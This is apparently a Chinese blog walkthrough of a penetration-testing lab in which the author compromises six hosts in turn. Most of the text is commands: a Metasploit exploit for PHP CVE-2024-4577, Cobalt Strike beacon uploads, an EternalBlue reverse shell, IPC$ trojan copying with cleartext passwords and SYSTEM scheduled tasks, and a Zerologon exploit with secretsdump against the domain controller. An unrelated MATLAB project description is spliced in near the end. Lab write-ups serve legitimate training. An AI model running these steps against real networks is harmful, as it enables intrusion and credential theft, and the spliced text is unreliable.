内网渗透-VPC-1(内网打靶项目)

环境搭建

靶机环境拓扑

共六台主机,四张网卡,配置完成后得到:

kali:VMnet8
Server 2012:VMnet8   VMnet2
Win7:VMnet2    
Win10:VMnet 2   VMnet3
Server 2012 R2:VMnet3 VMnet1
Server 2012-WEB:VMnet1 
Server 2016-AD-2016:VMnet1

打靶

已知条件:Server 2012 IP:172.16.6.60

Server 2012:

访问 80 端口:

wapplyzer 指纹识别发现了 php8.2.12,存在历史漏洞,编号为:CVE-2024-4577

方法一

百度搜索发现可以 RCE,msf 中也有漏洞利用模块:

msfconsole -q
search CVE-2024-4577

use 0
show options

设置攻击地址直接攻击,弹 shell 成功

上线 cs,生产可执行文件

upload /root/wwj.exe C:\\Windows\\Temp\\wwj.exe
execute -f C:\\Windows\\Temp\\wwj.exe   \\运行可执行文件wwj.exe

成功上线 cs

发现直接是 Adminstartor 用户,故不用提权

然后进行信息收集

尝试密码喷射技术横向

尝试 hash,但是没有抓到明文

ipconfig 查看到另一个网段为 192.168.2.0

上传一个 fscan.exe 扫描一下该网段

fscan.exe -h 192.168.2.0/24

扫描到第二台机器:192.168.2.129

注意到开启了 445 端口,尝试验证永恒之蓝

这里注意先建立路由

run post/multi/manage/autoroute
run autoroute -p

利用永恒之蓝:

因为这里2.1机器有防火墙,使该机器反向连接上线

这里2.140机器是出网web服务机器的另一张网卡

use exploit/windows/smb/ms17_010_eternalblue  # 使用该模块
set payload windows/x64/meterpreter/reverse_tcp   # 在当前模块设置一个payload,端口为该模块提供端口
set rhost 192.168.2.1   # 设置目标主机
set lhost 192.168.2.140   # 设置监听主机
set lport 1236
use exploit/multi/handler #回到exploit/multi/handler 模块,设置监听器以接受目标主机反向连接
set lhost 192.168.2.140  # 设置监听主机
set lport 1236      
use exploit/windows/smb/ms17_010_eternalblue  # 回到exploit/windows/smb/ms17_010_eternalblue模块
run

use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.66.129
run

永恒之蓝上线后,利用 msf 上线到 cs 上,后续使用 cs 做

信息收集

fsacn 扫描

win10

与 win10 主机建立 IPC$连接

抓取 hash 和明文连接

发现一个密码,尝试密码喷洒,因为 2 网段只剩下 2.142 主机,直接尝试 ipc$连接

net use \192.168.2.142\IPC$ /user:administrator "xiaodi"

上传木马到边界机再通过IPC$命令复制到142目标机器

复制到目标机器

copy fadehua.exe 192.168.2.142\C$

通过计划任务执行该文件

schtasks /create /s 192.168.2.142 /U administrator /P xiaodi /ru "SYSTEM" /tn fadehua /sc DAILY /tr c:\fadehua.exe /F
schtasks /run /s 192.168.2.142 /U administrator /P xiaodi /tn fadehua /i

成功上线

WinServer2012-r2

继续信息收集:

发现还有3网段

网络探测

上传fscan并扫描3网段

抓取hash和明文密码

目前只发现了133主机开启了7001端口,推测开启了weblogic,开启二层代理访问

访问到 192.168.3.133:7001

直接使用 weblogic 工具一把梭

发现存在漏洞,哥斯拉挂上代理,连接

cs 上线:

设置监听:

上传木马到目标机器:

哥斯拉运行木马成功上线:

成功上线

WinServer2012-WEB

信息收集

发现有张 10 网段的网卡

上传 fscan 扫描

抓取 hash 和明文

发现新密码尝试密码喷洒

net use \192.168.10.10\IPC$ /user:Administrator "Admin12345'

设置代理

copy 12.exe192.168.10.12\C$

schtasks /create /s 192.168.10.12 /U administrator /P Admin12345 /ru "SYSTEM" /tn fadehua /sc DAILY /tr c:\12.exe /F # 创beacon任务对应执行文件

schtasks /run /s 192.168.10,12 /U administrator /P Admin12345 /tn fadehua
#运行beacon任务

但是上线失败了

使用 psexec 横向移动

成功上线

域控Server 2016

信息收集

上传 fsacn

抓取 hash 和明文密码

这里存在一个域控的历史漏洞:CVE-2020-1472

使用工具检查并利用后成功上线最后一台域控机器,至此靶机被全部打穿

工具利用步骤:
1. 检测漏洞:python zerologon_check_vulnerable.py DC 域控IP
2. 利用漏洞将域控密码置空:python zero-logon-exploit.py DC 域控IP
3. 使用空hash获取域控凭据:secretsdump.exe 域/DC$@域控IP -just-dc -no-pass
4. 恢复域控密码:powershell Reset-ComputerMachinePassword
复杂几何的多球近似MATLAB类及多球模型的比较 MATLAB类Approxi提供了一个框架,用于使用具有迭代缩放的聚集球体模型来近似解剖体积模型,以适应目标体积和模型比较。专为骨科、生物力学和计算几何应用而开发。 MATLAB class for multi-sphere approximation of complex geometries and comparison of multi-sphere models 主要特点: 球体模型生成 1.多球体模型生成:与Sihaeri的聚集球体算法的接口 2.音量缩放 基于体素的球体模型和参考几何体的交集。 迭代缩放球体模型以匹配目标体积。 3.模型比较:不同模型体素占用率的频率分析(多个评分指标) 4.几何分析:原始曲面模型和球体模型之间的顶点到最近邻距离映射(带颜色编码结果)。 如何使用: 1.代码结构:Approxi类可以集成到相应的主脚本中。代码的关键部分被提取到单独的函数中以供重用。 2.导入:将STL(或网格)导入MATLAB,并确保所需的函数,如DEM clusteredSphere(populateSpheres)和inpolyhedron,已添加到MATLAB路径中 3.生成多球体模型:使用DEM clusteredSphere方法从输入网格创建多球体模型 4.运行体积交点:计算多球体模型和参考几何体之间的基于体素的交点,并调整多球体模型以匹配目标体积 5.比较和可视化模型:比较多个多球体模型的体素频率,并计算多球体模型与原始表面模型之间的距离,以进行2D/3D可视化 使用案例: 骨科和生物力学体积建模 复杂结构的多球模型形状近似 基于体素拟合度量的模型选择 基于距离的患者特定几何形状和近似值分析 优点: 复杂几何的多球体模型 可扩展模型(基于体素)-自动调整到目标体积 可视化就绪输出(距离图)
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值